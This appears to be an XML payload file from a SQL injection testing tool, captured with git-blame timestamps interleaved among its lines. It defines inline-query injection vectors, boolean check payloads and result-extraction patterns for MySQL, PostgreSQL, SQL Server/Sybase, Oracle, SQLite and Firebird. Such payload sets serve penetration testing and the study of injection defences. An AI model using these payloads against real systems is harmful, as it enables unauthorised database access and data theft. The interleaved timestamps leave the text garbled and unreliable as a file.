2015-02-18 13:13:44 +03:00
<?xml version="1.0" encoding="UTF-8"?>
<root >
<!-- Inline queries tests -->
<test >
2020-02-07 16:02:45 +03:00
<title > Generic inline queries</title>
2015-02-20 21:33:04 +03:00
<stype > 3</stype>
2015-02-18 13:13:44 +03:00
<level > 1</level>
<risk > 1</risk>
<clause > 1,2,3,8</clause>
<where > 3</where>
2020-02-07 16:02:45 +03:00
<vector > (SELECT CONCAT(CONCAT('[DELIMITER_START]',([QUERY])),'[DELIMITER_STOP]'))</vector>
<request >
<payload > (SELECT CONCAT(CONCAT('[DELIMITER_START]',(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)),'[DELIMITER_STOP]'))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
</test>
<test >
<title > MySQL inline queries</title>
<stype > 3</stype>
<level > 2</level>
<risk > 1</risk>
<clause > 1,2,3,8</clause>
<where > 3</where>
2015-02-18 13:13:44 +03:00
<vector > (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
<request >
2020-02-07 16:02:45 +03:00
<payload > (SELECT CONCAT('[DELIMITER_START]',(ELT([RANDNUM]=[RANDNUM],1)),'[DELIMITER_STOP]'))</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
<test >
<title > PostgreSQL inline queries</title>
2015-02-20 21:33:04 +03:00
<stype > 3</stype>
2020-02-07 16:02:45 +03:00
<level > 2</level>
2015-02-18 13:13:44 +03:00
<risk > 1</risk>
<clause > 1,2,3,8</clause>
<where > 3</where>
<vector > (SELECT '[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]')</vector>
<request >
<payload > (SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]')</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > PostgreSQL</dbms>
</details>
</test>
<test >
<title > Microsoft SQL Server/Sybase inline queries</title>
2015-02-20 21:33:04 +03:00
<stype > 3</stype>
2020-02-07 16:02:45 +03:00
<level > 2</level>
2015-02-18 13:13:44 +03:00
<risk > 1</risk>
<clause > 1,2,3,8</clause>
<where > 3</where>
<vector > (SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')</vector>
<request >
2020-02-07 16:02:45 +03:00
<payload > (SELECT '[DELIMITER_START]'+(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)+'[DELIMITER_STOP]')</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
<os > Windows</os>
</details>
</test>
<test >
<title > Oracle inline queries</title>
2015-02-20 21:33:04 +03:00
<stype > 3</stype>
<level > 2</level>
2015-02-18 13:13:44 +03:00
<risk > 1</risk>
<clause > 1,2,3,8</clause>
<where > 3</where>
<vector > (SELECT ('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') FROM DUAL)</vector>
<request >
2020-01-21 13:18:34 +03:00
<!-- NOTE: Vertica works too without the TO_NUMBER() -->
2020-02-07 16:02:45 +03:00
<payload > (SELECT '[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN TO_NUMBER(1) ELSE TO_NUMBER(0) END)||'[DELIMITER_STOP]' FROM DUAL)</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
<test >
<title > SQLite inline queries</title>
2015-02-20 21:33:04 +03:00
<stype > 3</stype>
<level > 3</level>
2015-02-18 13:13:44 +03:00
<risk > 1</risk>
<clause > 1,2,3,8</clause>
<where > 3</where>
<vector > SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'</vector>
<request >
2020-02-07 16:02:45 +03:00
<payload > SELECT '[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)||'[DELIMITER_STOP]'</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > SQLite</dbms>
</details>
</test>
2015-03-03 17:18:53 +03:00
2015-02-18 13:13:44 +03:00
<test >
<title > Firebird inline queries</title>
2015-02-20 21:33:04 +03:00
<stype > 3</stype>
<level > 3</level>
2015-02-18 13:13:44 +03:00
<risk > 1</risk>
<clause > 1,2,3,8</clause>
<where > 3</where>
<vector > SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]' FROM RDB$DATABASE</vector>
<request >
<payload > SELECT '[DELIMITER_START]'||(CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END)||'[DELIMITER_STOP]' FROM RDB$DATABASE</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Firebird</dbms>
</details>
</test>
<!-- End of inline queries tests -->
</root>